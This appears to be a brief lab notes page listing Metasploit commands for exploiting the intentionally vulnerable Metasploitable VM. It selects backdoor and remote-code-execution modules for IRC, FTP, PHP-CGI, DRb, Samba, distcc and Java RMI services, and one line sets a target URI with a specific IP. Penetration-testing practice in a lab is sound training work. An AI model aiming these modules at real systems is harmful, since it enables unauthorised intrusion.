Exploiting Metasploitable with Metasploit in Kali Linux

use exploit/unix/irc/unreal_ircd_3281_backdoor
 
use exploit/unix/ftp/vsftpd_234_backdoor


use exploit/multi/http/php_cgi_arg_injection      


use exploit/linux/misc/drb_remote_codeexec
set URI druby://162.212.182.20:8787


use exploit/multi/samba/usermap_script


use exploit/unix/misc/distcc_exec


use exploit/multi/misc/java_rmi_server

你可能感兴趣的:(metasploit)